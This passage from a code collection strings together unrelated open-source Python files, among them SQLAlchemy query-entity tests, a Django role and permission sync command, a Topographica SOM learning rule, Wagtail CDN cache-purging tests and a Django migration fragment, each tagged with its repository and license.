for rrule in get_as_list(ical_event, 'RRULE'):
rrule = rrulestr(rrule.to_ical(), dtstart=event.start)
rset.rrule(rrule)
for exrule in get_as_list(ical_event, 'EXRULE'):
exrule = rrulestr(exrule.to_ical(), dtstart=event.start)
rset.exrule(exrule)
for rdate in get_as_list(ical_event, 'RDATE'):
for dt in rdate.dts:
rset.rdate(to_utc(dt.dt))
for exdate in get_as_list(ical_event, 'EXDATE'):
for dt in exdate.dts:
rset.exdate(to_utc(dt.dt))
return from_dateutil_rruleset(rset)
| yvan-sraka/wprevents | wprevents/admin/event_importer.py | Python | bsd-3-clause | 8,479 |
import sqlalchemy as sa
from sqlalchemy_utils import get_query_entities
from tests import TestCase
class TestGetQueryEntities(TestCase):
def create_models(self):
class TextItem(self.Base):
__tablename__ = 'text_item'
id = sa.Column(sa.Integer, primary_key=True)
type = sa.Column(sa.Unicode(255))
__mapper_args__ = {
'polymorphic_on': type,
}
class Article(TextItem):
__tablename__ = 'article'
id = sa.Column(
sa.Integer, sa.ForeignKey(TextItem.id), primary_key=True
)
category = sa.Column(sa.Unicode(255))
__mapper_args__ = {
'polymorphic_identity': u'article'
}
class BlogPost(TextItem):
__tablename__ = 'blog_post'
id = sa.Column(
sa.Integer, sa.ForeignKey(TextItem.id), primary_key=True
)
__mapper_args__ = {
'polymorphic_identity': u'blog_post'
}
self.TextItem = TextItem
self.Article = Article
self.BlogPost = BlogPost
def test_mapper(self):
query = self.session.query(sa.inspect(self.TextItem))
assert list(get_query_entities(query)) == [self.TextItem]
def test_entity(self):
query = self.session.query(self.TextItem)
assert list(get_query_entities(query)) == [self.TextItem]
def test_instrumented_attribute(self):
query = self.session.query(self.TextItem.id)
assert list(get_query_entities(query)) == [self.TextItem]
def test_column(self):
query = self.session.query(self.TextItem.__table__.c.id)
assert list(get_query_entities(query)) == [self.TextItem.__table__]
def test_aliased_selectable(self):
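# with_polymorphic wraps TextItem and its BlogPost subclass in a single
# aliased selectable, which should itself be reported as the entity.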
selectable = sa.orm.with_polymorphic(self.TextItem, [self.BlogPost])
query = self.session.query(selectable)
assert list(get_query_entities(query)) == [selectable]
def test_joined_entity(self):
query = self.session.query(self.TextItem).join(
self.BlogPost, self.BlogPost.id == self.TextItem.id
)
assert list(get_query_entities(query)) == [
self.TextItem, self.BlogPost
]
def test_joined_aliased_entity(self):
alias = sa.orm.aliased(self.BlogPost)
query = self.session.query(self.TextItem).join(
alias, alias.id == self.TextItem.id
)
assert list(get_query_entities(query)) == [self.TextItem, alias]
def test_column_entity_with_label(self):
query = self.session.query(self.Article.id.label('id'))
assert list(get_query_entities(query)) == [sa.inspect(self.Article)]
def test_with_subquery(self):
number_of_articles = (
sa.select(
[sa.func.count(self.Article.id)],
)
.select_from(
self.Article.__table__
)
).label('number_of_articles')
query = self.session.query(self.Article, number_of_articles)
assert list(get_query_entities(query)) == [self.Article, number_of_articles]
def test_aliased_entity(self):
alias = sa.orm.aliased(self.Article)
query = self.session.query(alias)
assert list(get_query_entities(query)) == [alias]
| tonyseek/sqlalchemy-utils | tests/functions/test_get_query_entities.py | Python | bsd-3-clause | 3,353 |
# -*- coding: utf-8 -*-
#
# This file is part of Django appschema released under the MIT license.
# See the LICENSE for more information.
from optparse import make_option
from django.conf import settings
from django.core.management.base import BaseCommand
from django.contrib.contenttypes.models import ContentType
from django.utils.importlib import import_module
import yaml
import os.path
from scholrroles.models import Role, Permission
class Command(BaseCommand):
help = 'Syncs Role and Permission objects from roles.yml and permissions.yml files in installed apps'
option_list = BaseCommand.option_list + (
make_option('--file', action='store', dest='role_file',
default=None, help='Select a file with roles. '
'Defaults to the settings.ROLE_FILE.'),
)
def handle(self, *args, **options):
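# Gather roles.yml definitions from every installed app and sync the
# Role table, then repeat the process for permissions.yml / Permission.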
files, roles = self.get_roles_files(), []
for role_file in files:
stream = open(role_file, 'r')
data = yaml.load(stream)
roles.extend(data['roles'])
self.update_roles(roles)
files, perms = self.get_permission_files(), []
for perm_file in files:
stream = open(perm_file, 'r')
data = yaml.load(stream)
perms.extend(data['perms'])
self.update_perms(perms)
def get_roles_files(self):
files = []
for app in settings.INSTALLED_APPS:
module = import_module(app)
pth = os.path.abspath(module.__path__[0])
if os.path.isfile(pth + '/roles.yml'):
files.append(pth + '/roles.yml')
return files
def get_permission_files(self):
files = []
for app in settings.INSTALLED_APPS:
module = import_module(app)
pth = os.path.abspath(module.__path__[0])
if os.path.isfile(pth + '/permissions.yml'):
files.append(pth + '/permissions.yml')
return files
def update_roles(self, roles):
existing_roles = Role.objects.all().values_list('name', flat=True)
print """
--------------------
Create Roles
--------------------
"""
for role in roles:
if role not in existing_roles:
print role
Role.objects.create(name = role)
to_delete = [x for x in existing_roles if x not in roles]
if to_delete:
print """
--------------------
Delete Roles
--------------------
"""
for role in to_delete:
print role
Role.objects.filter(name__in = to_delete).delete()
def update_perms(self, perms):
existing_perms = Permission.objects.all()
dont_delete = []
for perm in perms:
existing_perm = existing_perms.filter(content_type=ContentType.objects.get_by_natural_key(perm['app_label'], perm['model']),
name = perm['name'], instance_perm = perm['instance_perm'])
if existing_perm:
self.update_perm_roles(perm, existing_perm[0])
dont_delete.append(existing_perm[0].pk)
else:
existing_perm = Permission.objects.create(content_type=ContentType.objects.get_by_natural_key(perm['app_label'], perm['model']),
name = perm['name'], instance_perm = perm['instance_perm'])
dont_delete.append(existing_perm.pk)
print u" Created Permission: {}".format(existing_perm)
self.update_perm_roles(perm, existing_perm)
to_delete = Permission.objects.exclude(pk__in=dont_delete)
if to_delete:
print """
--------------------
Delete Permissions
--------------------
"""
for perm in to_delete:
print perm
to_delete.delete()
def update_perm_roles(self, perm, existing_perm):
if existing_perm.roles.filter(name__in=perm['roles']).count() < len(perm['roles']):
print " Adding roles to: {}".format(existing_perm)
for role in perm['roles']:
if not existing_perm.roles.filter(name=role).exists():
print " Adding role: {}".format(role)
existing_perm.roles.add(Role.objects.get(name=role))
to_delete = existing_perm.roles.exclude(name__in = perm['roles'])
for role in to_delete:
print u" Deleting role from: {}, {}".format(existing_perm,role)
existing_perm.roles.remove(role)
| Scholr/scholr-roles | scholrroles/management/commands/update_roles.py | Python | bsd-3-clause | 4,576 |
# encoding: utf-8
"""
__init__.py
Created by Thomas Mangin on 2010-01-15.
Copyright (c) 2009-2015 Exa Networks. All rights reserved.
"""
| fugitifduck/exabgp | lib/exabgp/__init__.py | Python | bsd-3-clause | 138 |
"""
SOM-based learning functions for CFProjections.
"""
from math import ceil
import param
from imagen import PatternGenerator, Gaussian
from holoviews import BoundingBox
from topo.base.arrayutil import L2norm, array_argmax
from topo.base.cf import CFPLearningFn
### JABHACKALERT: This class will be removed once the examples no
### longer rely upon it
class CFPLF_SOM(CFPLearningFn):
"""
An abstract base class of learning functions for Self-Organizing Maps.
This implementation is obsolete and will be removed soon.
Please see examples/cfsom_or.ty for current SOM support.
"""
__abstract = True
learning_radius = param.Number(default=0.0,doc=
"""
The radius of the neighborhood function to be used for
learning. Typically, this value will be set by the Sheet or
Projection owning this CFPLearningFn, but it can also be set
explicitly by the user.
""")
def __init__(self,**params):
self.warning("CFPLF_SOM is deprecated -- see the example in cfsom_or.ty for how to build a SOM")
def __call__(self, proj, input_activity, output_activity, learning_rate, **params):
raise NotImplementedError
### JABHACKALERT: This class will be removed once the examples no
### longer rely upon it
class CFPLF_HebbianSOM(CFPLF_SOM):
"""
Hebbian learning rule for CFProjections to Self-Organizing Maps.
This implementation is obsolete and will be removed soon.
Please see examples/cfsom_or.ty for current SOM support.
"""
learning_radius = param.Number(default=0.0)
crop_radius_multiplier = param.Number(default=3.0,doc=
"""
Factor by which the radius should be multiplied,
when deciding how far from the winner to keep updating the weights.
""")
neighborhood_kernel_generator = param.ClassSelector(PatternGenerator,
default=Gaussian(x=0.0,y=0.0,aspect_ratio=1.0),
doc="Neighborhood function")
def __call__(self, iterator, input_activity, output_activity, learning_rate, **params):
cfs = iterator.proj.cfs.tolist() # CEBALERT: convert to use flatcfs
rows,cols = output_activity.shape
# This learning function does not need to scale the learning
# rate like some do, so it does not use constant_sum_connection_rate()
single_connection_learning_rate = learning_rate
### JABALERT: The learning_radius is normally set by
### the learn() function of CFSOM, so it doesn't matter
### much that the value accepted here is in matrix and
### not sheet coordinates. It's confusing that anything
### would accept matrix coordinates, but the learning_fn
### doesn't have access to the sheet, so it can't easily
### convert from sheet coords.
radius = self.learning_radius
crop_radius = max(1.25,radius*self.crop_radius_multiplier)
# find out the matrix coordinates of the winner
#
# NOTE: when there are multiple projections, it would be
# slightly more efficient to calculate the winner coordinates
# within the Sheet, e.g. by moving winner_coords() to CFSOM
# and passing in the results here. However, finding the
# coordinates does not take much time, and requiring the
# winner to be passed in would make it harder to mix and match
# Projections and learning rules with different Sheets.
wr,wc = array_argmax(output_activity)
# Optimization: Calculate the bounding box around the winner
# in which weights will be changed, to avoid considering those
# units below.
cmin = int(max(wc-crop_radius,0))
cmax = int(min(wc+crop_radius+1,cols)) # at least 1 between cmin and cmax
rmin = int(max(wr-crop_radius,0))
rmax = int(min(wr+crop_radius+1,rows))
# generate the neighborhood kernel matrix so that the values
# can be read off easily using matrix coordinates.
nk_generator = self.neighborhood_kernel_generator
radius_int = int(ceil(crop_radius))
rbound = radius_int + 0.5
bb = BoundingBox(points=((-rbound,-rbound), (rbound,rbound)))
# Print parameters designed to match fm2d's output
#print "%d rad= %d std= %f alpha= %f" % (topo.sim._time, radius_int, radius, single_connection_learning_rate)
neighborhood_matrix = nk_generator(bounds=bb,xdensity=1,ydensity=1,
size=2*radius)
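# Classic Hebbian SOM update: every unit within crop_radius of the
# winner moves its weights toward the current input, scaled by the
# learning rate and the neighborhood kernel value at its lattice distance.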
for r in range(rmin,rmax):
for c in range(cmin,cmax):
cwc = c - wc
rwr = r - wr
lattice_dist = L2norm((cwc,rwr))
if lattice_dist <= crop_radius:
cf = cfs[r][c]
rate = single_connection_learning_rate * neighborhood_matrix[rwr+radius_int,cwc+radius_int]
X = cf.get_input_matrix(input_activity)
cf.weights += rate * (X - cf.weights)
# CEBHACKALERT: see ConnectionField.__init__()
cf.weights *= cf.mask
| ioam/topographica | topo/learningfn/som.py | Python | bsd-3-clause | 5,130 |
from unittest import mock
from urllib.error import HTTPError, URLError
import requests
from azure.mgmt.cdn import CdnManagementClient
from azure.mgmt.frontdoor import FrontDoorManagementClient
from django.core.exceptions import ImproperlyConfigured
from django.test import TestCase
from django.test.utils import override_settings
from wagtail.contrib.frontend_cache.backends import (
AzureCdnBackend, AzureFrontDoorBackend, BaseBackend, CloudflareBackend, CloudfrontBackend,
HTTPBackend)
from wagtail.contrib.frontend_cache.utils import get_backends
from wagtail.core.models import Page
from wagtail.tests.testapp.models import EventIndex
from .utils import (
PurgeBatch, purge_page_from_cache, purge_pages_from_cache, purge_url_from_cache,
purge_urls_from_cache)
class TestBackendConfiguration(TestCase):
def test_default(self):
backends = get_backends()
self.assertEqual(len(backends), 0)
def test_varnish(self):
backends = get_backends(backend_settings={
'varnish': {
'BACKEND': 'wagtail.contrib.frontend_cache.backends.HTTPBackend',
'LOCATION': 'http://localhost:8000',
},
})
self.assertEqual(set(backends.keys()), set(['varnish']))
self.assertIsInstance(backends['varnish'], HTTPBackend)
self.assertEqual(backends['varnish'].cache_scheme, 'http')
self.assertEqual(backends['varnish'].cache_netloc, 'localhost:8000')
def test_cloudflare(self):
backends = get_backends(backend_settings={
'cloudflare': {
'BACKEND': 'wagtail.contrib.frontend_cache.backends.CloudflareBackend',
'EMAIL': '[email protected]',
'API_KEY': 'this is the api key',
'ZONEID': 'this is a zone id',
'BEARER_TOKEN': 'this is a bearer token'
},
})
self.assertEqual(set(backends.keys()), set(['cloudflare']))
self.assertIsInstance(backends['cloudflare'], CloudflareBackend)
self.assertEqual(backends['cloudflare'].cloudflare_email, '[email protected]')
self.assertEqual(backends['cloudflare'].cloudflare_api_key, 'this is the api key')
self.assertEqual(backends['cloudflare'].cloudflare_token, 'this is a bearer token')
def test_cloudfront(self):
backends = get_backends(backend_settings={
'cloudfront': {
'BACKEND': 'wagtail.contrib.frontend_cache.backends.CloudfrontBackend',
'DISTRIBUTION_ID': 'frontend',
},
})
self.assertEqual(set(backends.keys()), set(['cloudfront']))
self.assertIsInstance(backends['cloudfront'], CloudfrontBackend)
self.assertEqual(backends['cloudfront'].cloudfront_distribution_id, 'frontend')
def test_azure_cdn(self):
backends = get_backends(backend_settings={
'azure_cdn': {
'BACKEND': 'wagtail.contrib.frontend_cache.backends.AzureCdnBackend',
'RESOURCE_GROUP_NAME': 'test-resource-group',
'CDN_PROFILE_NAME': 'wagtail-io-profile',
'CDN_ENDPOINT_NAME': 'wagtail-io-endpoint',
},
})
self.assertEqual(set(backends.keys()), set(['azure_cdn']))
self.assertIsInstance(backends['azure_cdn'], AzureCdnBackend)
self.assertEqual(backends['azure_cdn']._resource_group_name, 'test-resource-group')
self.assertEqual(backends['azure_cdn']._cdn_profile_name, 'wagtail-io-profile')
self.assertEqual(backends['azure_cdn']._cdn_endpoint_name, 'wagtail-io-endpoint')
def test_azure_front_door(self):
backends = get_backends(backend_settings={
'azure_front_door': {
'BACKEND': 'wagtail.contrib.frontend_cache.backends.AzureFrontDoorBackend',
'RESOURCE_GROUP_NAME': 'test-resource-group',
'FRONT_DOOR_NAME': 'wagtail-io-front-door',
},
})
self.assertEqual(set(backends.keys()), set(['azure_front_door']))
self.assertIsInstance(backends['azure_front_door'], AzureFrontDoorBackend)
self.assertEqual(backends['azure_front_door']._resource_group_name, 'test-resource-group')
self.assertEqual(backends['azure_front_door']._front_door_name, 'wagtail-io-front-door')
def test_azure_cdn_get_client(self):
mock_credentials = mock.MagicMock()
backends = get_backends(backend_settings={
'azure_cdn': {
'BACKEND': 'wagtail.contrib.frontend_cache.backends.AzureCdnBackend',
'RESOURCE_GROUP_NAME': 'test-resource-group',
'CDN_PROFILE_NAME': 'wagtail-io-profile',
'CDN_ENDPOINT_NAME': 'wagtail-io-endpoint',
'SUBSCRIPTION_ID': 'fake-subscription-id',
'CREDENTIALS': mock_credentials,
},
})
self.assertEqual(set(backends.keys()), set(['azure_cdn']))
client = backends['azure_cdn']._get_client()
self.assertIsInstance(client, CdnManagementClient)
self.assertEqual(client.config.subscription_id, 'fake-subscription-id')
self.assertIs(client.config.credentials, mock_credentials)
def test_azure_front_door_get_client(self):
mock_credentials = mock.MagicMock()
backends = get_backends(backend_settings={
'azure_front_door': {
'BACKEND': 'wagtail.contrib.frontend_cache.backends.AzureFrontDoorBackend',
'RESOURCE_GROUP_NAME': 'test-resource-group',
'FRONT_DOOR_NAME': 'wagtail-io-fake-front-door-name',
'SUBSCRIPTION_ID': 'fake-subscription-id',
'CREDENTIALS': mock_credentials,
},
})
client = backends['azure_front_door']._get_client()
self.assertEqual(set(backends.keys()), set(['azure_front_door']))
self.assertIsInstance(client, FrontDoorManagementClient)
self.assertEqual(client.config.subscription_id, 'fake-subscription-id')
self.assertIs(client.config.credentials, mock_credentials)
@mock.patch('wagtail.contrib.frontend_cache.backends.AzureCdnBackend._make_purge_call')
def test_azure_cdn_purge(self, make_purge_call_mock):
backends = get_backends(backend_settings={
'azure_cdn': {
'BACKEND': 'wagtail.contrib.frontend_cache.backends.AzureCdnBackend',
'RESOURCE_GROUP_NAME': 'test-resource-group',
'CDN_PROFILE_NAME': 'wagtail-io-profile',
'CDN_ENDPOINT_NAME': 'wagtail-io-endpoint',
'CREDENTIALS': 'Fake credentials',
},
})
self.assertEqual(set(backends.keys()), set(['azure_cdn']))
self.assertIsInstance(backends['azure_cdn'], AzureCdnBackend)
# purge()
backends['azure_cdn'].purge('http://www.wagtail.org/home/events/christmas/?test=1')
make_purge_call_mock.assert_called_once()
call_args = tuple(make_purge_call_mock.call_args)[0]
self.assertEqual(len(call_args), 2)
self.assertIsInstance(call_args[0], CdnManagementClient)
self.assertEqual(call_args[1], ["/home/events/christmas/?test=1"])
make_purge_call_mock.reset_mock()
# purge_batch()
backends['azure_cdn'].purge_batch([
'http://www.wagtail.org/home/events/christmas/?test=1', 'http://torchbox.com/blog/'
])
make_purge_call_mock.assert_called_once()
call_args = tuple(make_purge_call_mock.call_args)[0]
self.assertIsInstance(call_args[0], CdnManagementClient)
self.assertEqual(call_args[1], ["/home/events/christmas/?test=1", "/blog/"])
@mock.patch('wagtail.contrib.frontend_cache.backends.AzureFrontDoorBackend._make_purge_call')
def test_azure_front_door_purge(self, make_purge_call_mock):
backends = get_backends(backend_settings={
'azure_front_door': {
'BACKEND': 'wagtail.contrib.frontend_cache.backends.AzureFrontDoorBackend',
'RESOURCE_GROUP_NAME': 'test-resource-group',
'FRONT_DOOR_NAME': 'wagtail-io-front-door',
'CREDENTIALS': 'Fake credentials',
},
})
self.assertEqual(set(backends.keys()), set(['azure_front_door']))
self.assertIsInstance(backends['azure_front_door'], AzureFrontDoorBackend)
# purge()
backends['azure_front_door'].purge('http://www.wagtail.org/home/events/christmas/?test=1')
make_purge_call_mock.assert_called_once()
call_args = tuple(make_purge_call_mock.call_args)[0]
self.assertIsInstance(call_args[0], FrontDoorManagementClient)
self.assertEqual(call_args[1], ["/home/events/christmas/?test=1"])
make_purge_call_mock.reset_mock()
# purge_batch()
backends['azure_front_door'].purge_batch([
'http://www.wagtail.org/home/events/christmas/?test=1', 'http://torchbox.com/blog/'
])
make_purge_call_mock.assert_called_once()
call_args = tuple(make_purge_call_mock.call_args)[0]
self.assertIsInstance(call_args[0], FrontDoorManagementClient)
self.assertEqual(call_args[1], ["/home/events/christmas/?test=1", "/blog/"])
def test_http(self):
"""Test that `HTTPBackend.purge` works when urlopen succeeds"""
self._test_http_with_side_effect(urlopen_side_effect=None)
def test_http_httperror(self):
"""Test that `HTTPBackend.purge` can handle `HTTPError`"""
http_error = HTTPError(
url='http://localhost:8000/home/events/christmas/',
code=500,
msg='Internal Server Error',
hdrs={},
fp=None
)
with self.assertLogs(level='ERROR') as log_output:
self._test_http_with_side_effect(urlopen_side_effect=http_error)
self.assertIn(
"Couldn't purge 'http://www.wagtail.org/home/events/christmas/' from HTTP cache. HTTPError: 500 Internal Server Error",
log_output.output[0]
)
def test_http_urlerror(self):
"""Test that `HTTPBackend.purge` can handle `URLError`"""
url_error = URLError(reason='just for tests')
with self.assertLogs(level='ERROR') as log_output:
self._test_http_with_side_effect(urlopen_side_effect=url_error)
self.assertIn(
"Couldn't purge 'http://www.wagtail.org/home/events/christmas/' from HTTP cache. URLError: just for tests",
log_output.output[0]
)
@mock.patch('wagtail.contrib.frontend_cache.backends.urlopen')
def _test_http_with_side_effect(self, urlopen_mock, urlopen_side_effect):
# given a backends configuration with one HTTP backend
backends = get_backends(backend_settings={
'varnish': {
'BACKEND': 'wagtail.contrib.frontend_cache.backends.HTTPBackend',
'LOCATION': 'http://localhost:8000',
},
})
self.assertEqual(set(backends.keys()), set(['varnish']))
self.assertIsInstance(backends['varnish'], HTTPBackend)
# and mocked urlopen that may or may not raise network-related exception
urlopen_mock.side_effect = urlopen_side_effect
# when making a purge request
backends.get('varnish').purge('http://www.wagtail.org/home/events/christmas/')
# then no exception is raised
# and mocked urlopen is called with a proper purge request
self.assertEqual(urlopen_mock.call_count, 1)
(purge_request,), _call_kwargs = urlopen_mock.call_args
self.assertEqual(purge_request.full_url, 'http://localhost:8000/home/events/christmas/')
def test_cloudfront_validate_distribution_id(self):
with self.assertRaises(ImproperlyConfigured):
get_backends(backend_settings={
'cloudfront': {
'BACKEND': 'wagtail.contrib.frontend_cache.backends.CloudfrontBackend',
},
})
@mock.patch('wagtail.contrib.frontend_cache.backends.CloudfrontBackend._create_invalidation')
def test_cloudfront_distribution_id_mapping(self, _create_invalidation):
backends = get_backends(backend_settings={
'cloudfront': {
'BACKEND': 'wagtail.contrib.frontend_cache.backends.CloudfrontBackend',
'DISTRIBUTION_ID': {
'www.wagtail.org': 'frontend',
}
},
})
backends.get('cloudfront').purge('http://www.wagtail.org/home/events/christmas/')
backends.get('cloudfront').purge('http://torchbox.com/blog/')
_create_invalidation.assert_called_once_with('frontend', ['/home/events/christmas/'])
def test_multiple(self):
backends = get_backends(backend_settings={
'varnish': {
'BACKEND': 'wagtail.contrib.frontend_cache.backends.HTTPBackend',
'LOCATION': 'http://localhost:8000/',
},
'cloudflare': {
'BACKEND': 'wagtail.contrib.frontend_cache.backends.CloudflareBackend',
'EMAIL': '[email protected]',
'API_KEY': 'this is the api key',
'ZONEID': 'this is a zone id',
}
})
self.assertEqual(set(backends.keys()), set(['varnish', 'cloudflare']))
def test_filter(self):
backends = get_backends(backend_settings={
'varnish': {
'BACKEND': 'wagtail.contrib.frontend_cache.backends.HTTPBackend',
'LOCATION': 'http://localhost:8000/',
},
'cloudflare': {
'BACKEND': 'wagtail.contrib.frontend_cache.backends.CloudflareBackend',
'EMAIL': '[email protected]',
'API_KEY': 'this is the api key',
'ZONEID': 'this is a zone id',
}
}, backends=['cloudflare'])
self.assertEqual(set(backends.keys()), set(['cloudflare']))
@override_settings(WAGTAILFRONTENDCACHE_LOCATION='http://localhost:8000')
def test_backwards_compatibility(self):
backends = get_backends()
self.assertEqual(set(backends.keys()), set(['default']))
self.assertIsInstance(backends['default'], HTTPBackend)
self.assertEqual(backends['default'].cache_scheme, 'http')
self.assertEqual(backends['default'].cache_netloc, 'localhost:8000')
PURGED_URLS = []
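# Shared scratch list appended to by the mock backends below, letting
# tests assert exactly which URLs were purged and in what order.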
class MockBackend(BaseBackend):
def __init__(self, config):
pass
def purge(self, url):
PURGED_URLS.append(url)
class MockCloudflareBackend(CloudflareBackend):
def __init__(self, config):
pass
def _purge_urls(self, urls):
if len(urls) > self.CHUNK_SIZE:
raise Exception("Cloudflare backend is not chunking requests as expected")
PURGED_URLS.extend(urls)
@override_settings(WAGTAILFRONTENDCACHE={
'varnish': {
'BACKEND': 'wagtail.contrib.frontend_cache.tests.MockBackend',
},
})
class TestCachePurgingFunctions(TestCase):
fixtures = ['test.json']
def setUp(self):
# Reset PURGED_URLS to an empty list
PURGED_URLS[:] = []
def test_purge_url_from_cache(self):
purge_url_from_cache('http://localhost/foo')
self.assertEqual(PURGED_URLS, ['http://localhost/foo'])
def test_purge_urls_from_cache(self):
purge_urls_from_cache(['http://localhost/foo', 'http://localhost/bar'])
self.assertEqual(PURGED_URLS, ['http://localhost/foo', 'http://localhost/bar'])
def test_purge_page_from_cache(self):
page = EventIndex.objects.get(url_path='/home/events/')
purge_page_from_cache(page)
self.assertEqual(PURGED_URLS, ['http://localhost/events/', 'http://localhost/events/past/'])
def test_purge_pages_from_cache(self):
purge_pages_from_cache(EventIndex.objects.all())
self.assertEqual(PURGED_URLS, ['http://localhost/events/', 'http://localhost/events/past/'])
def test_purge_batch(self):
batch = PurgeBatch()
page = EventIndex.objects.get(url_path='/home/events/')
batch.add_page(page)
batch.add_url('http://localhost/foo')
batch.purge()
self.assertEqual(PURGED_URLS, ['http://localhost/events/', 'http://localhost/events/past/', 'http://localhost/foo'])
@override_settings(WAGTAILFRONTENDCACHE={
'cloudflare': {
'BACKEND': 'wagtail.contrib.frontend_cache.tests.MockCloudflareBackend',
},
})
class TestCloudflareCachePurgingFunctions(TestCase):
def setUp(self):
# Reset PURGED_URLS to an empty list
PURGED_URLS[:] = []
def test_cloudflare_purge_batch_chunked(self):
batch = PurgeBatch()
urls = ['https://localhost/foo{}'.format(i) for i in range(1, 65)]
batch.add_urls(urls)
batch.purge()
self.assertCountEqual(PURGED_URLS, urls)
@override_settings(WAGTAILFRONTENDCACHE={
'varnish': {
'BACKEND': 'wagtail.contrib.frontend_cache.tests.MockBackend',
},
})
class TestCachePurgingSignals(TestCase):
fixtures = ['test.json']
def setUp(self):
# Reset PURGED_URLS to an empty list
PURGED_URLS[:] = []
def test_purge_on_publish(self):
page = EventIndex.objects.get(url_path='/home/events/')
page.save_revision().publish()
self.assertEqual(PURGED_URLS, ['http://localhost/events/', 'http://localhost/events/past/'])
def test_purge_on_unpublish(self):
page = EventIndex.objects.get(url_path='/home/events/')
page.unpublish()
self.assertEqual(PURGED_URLS, ['http://localhost/events/', 'http://localhost/events/past/'])
def test_purge_with_unroutable_page(self):
root = Page.objects.get(url_path='/')
page = EventIndex(title='new top-level page')
root.add_child(instance=page)
page.save_revision().publish()
self.assertEqual(PURGED_URLS, [])
@override_settings(ROOT_URLCONF='wagtail.tests.urls_multilang',
LANGUAGE_CODE='en',
WAGTAILFRONTENDCACHE_LANGUAGES=['en', 'fr', 'pt-br'])
def test_purge_on_publish_in_multilang_env(self):
PURGED_URLS[:] = [] # reset PURGED_URLS to the empty list
page = EventIndex.objects.get(url_path='/home/events/')
page.save_revision().publish()
self.assertEqual(PURGED_URLS, [
'http://localhost/en/events/',
'http://localhost/en/events/past/',
'http://localhost/fr/events/',
'http://localhost/fr/events/past/',
'http://localhost/pt-br/events/',
'http://localhost/pt-br/events/past/',
])
@override_settings(ROOT_URLCONF='wagtail.tests.urls_multilang',
LANGUAGE_CODE='en',
WAGTAIL_I18N_ENABLED=True,
WAGTAIL_CONTENT_LANGUAGES=[('en', 'English'), ('fr', 'French')])
def test_purge_on_publish_with_i18n_enabled(self):
PURGED_URLS[:] = [] # reset PURGED_URLS to the empty list
page = EventIndex.objects.get(url_path='/home/events/')
page.save_revision().publish()
self.assertEqual(PURGED_URLS, [
'http://localhost/en/events/',
'http://localhost/en/events/past/',
'http://localhost/fr/events/',
'http://localhost/fr/events/past/',
])
@override_settings(ROOT_URLCONF='wagtail.tests.urls_multilang',
LANGUAGE_CODE='en',
WAGTAIL_CONTENT_LANGUAGES=[('en', 'English'), ('fr', 'French')])
def test_purge_on_publish_without_i18n_enabled(self):
# It should ignore WAGTAIL_CONTENT_LANGUAGES as WAGTAIL_I18N_ENABLED isn't set
PURGED_URLS[:] = [] # reset PURGED_URLS to the empty list
page = EventIndex.objects.get(url_path='/home/events/')
page.save_revision().publish()
self.assertEqual(PURGED_URLS, ['http://localhost/en/events/', 'http://localhost/en/events/past/'])
class TestPurgeBatchClass(TestCase):
# Tests the .add_*() methods on PurgeBatch. The .purge() method is tested
# by TestCachePurgingFunctions.test_purge_batch above
fixtures = ['test.json']
def test_add_url(self):
batch = PurgeBatch()
batch.add_url('http://localhost/foo')
self.assertEqual(batch.urls, ['http://localhost/foo'])
def test_add_urls(self):
batch = PurgeBatch()
batch.add_urls(['http://localhost/foo', 'http://localhost/bar'])
self.assertEqual(batch.urls, ['http://localhost/foo', 'http://localhost/bar'])
def test_add_page(self):
page = EventIndex.objects.get(url_path='/home/events/')
batch = PurgeBatch()
batch.add_page(page)
self.assertEqual(batch.urls, ['http://localhost/events/', 'http://localhost/events/past/'])
def test_add_pages(self):
batch = PurgeBatch()
batch.add_pages(EventIndex.objects.all())
self.assertEqual(batch.urls, ['http://localhost/events/', 'http://localhost/events/past/'])
def test_multiple_calls(self):
page = EventIndex.objects.get(url_path='/home/events/')
batch = PurgeBatch()
batch.add_page(page)
batch.add_url('http://localhost/foo')
batch.purge()
self.assertEqual(batch.urls, ['http://localhost/events/', 'http://localhost/events/past/', 'http://localhost/foo'])
@mock.patch('wagtail.contrib.frontend_cache.backends.requests.delete')
def test_http_error_on_cloudflare_purge_batch(self, requests_delete_mock):
backend_settings = {
'cloudflare': {
'BACKEND': 'wagtail.contrib.frontend_cache.backends.CloudflareBackend',
'EMAIL': '[email protected]',
'API_KEY': 'this is the api key',
'ZONEID': 'this is a zone id',
},
}
class MockResponse:
def __init__(self, status_code=200):
self.status_code = status_code
http_error = requests.exceptions.HTTPError(response=MockResponse(status_code=500))
requests_delete_mock.side_effect = http_error
page = EventIndex.objects.get(url_path='/home/events/')
batch = PurgeBatch()
batch.add_page(page)
with self.assertLogs(level='ERROR') as log_output:
batch.purge(backend_settings=backend_settings)
self.assertIn(
"Couldn't purge 'http://localhost/events/' from Cloudflare. HTTPError: 500",
log_output.output[0]
)
| jnns/wagtail | wagtail/contrib/frontend_cache/tests.py | Python | bsd-3-clause | 22,580 |
"""Some system-specific info for cyclus."""
import sys
import importlib
from cyclus.lazyasd import lazyobject
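# Each lazyobject below defers its import until first attribute access,
# so importing cyclus.system stays cheap and tolerates missing optional
# dependencies.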
@lazyobject
def PY_VERSION_TUPLE():
return sys.version_info[:3]
@lazyobject
def curio():
if PY_VERSION_TUPLE < (3, 5, 2):
return None
else:
try:
return importlib.import_module('curio')
except ImportError:
return None
@lazyobject
def asyncio():
if PY_VERSION_TUPLE < (3, 5, 0):
return None
else:
try:
return importlib.import_module('asyncio')
except ImportError:
return None
@lazyobject
def websockets():
if PY_VERSION_TUPLE < (3, 5, 0):
return None
else:
try:
return importlib.import_module('websockets')
except ImportError:
return None
@lazyobject
def concurrent_futures():
if PY_VERSION_TUPLE < (3, 2, 0):
return None
else:
try:
import concurrent.futures as m
return m
except ImportError:
return None
| hodger/cyclus | cyclus/system.py | Python | bsd-3-clause | 1,065 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('main', '0012_auto_20160204_1503'),
]
operations = [
migrations.AlterModelOptions(
name='eventassignment',
options={'permissions': (('can_be_assigned', 'Can be assigned to events'),)},
),
migrations.AlterField(
model_name='suggestedevent',
name='status',
field=models.CharField(default=b'created', max_length=40, choices=[(b'created', b'Created'), (b'submitted', b'Submitted'), (b'resubmitted', b'Resubmitted'), (b'rejected', b'Bounced back'), (b'retracted', b'Retracted'), (b'accepted', b'Accepted'), (b'removed', b'Removed')]),
preserve_default=True,
),
migrations.AlterField(
model_name='template',
name='content',
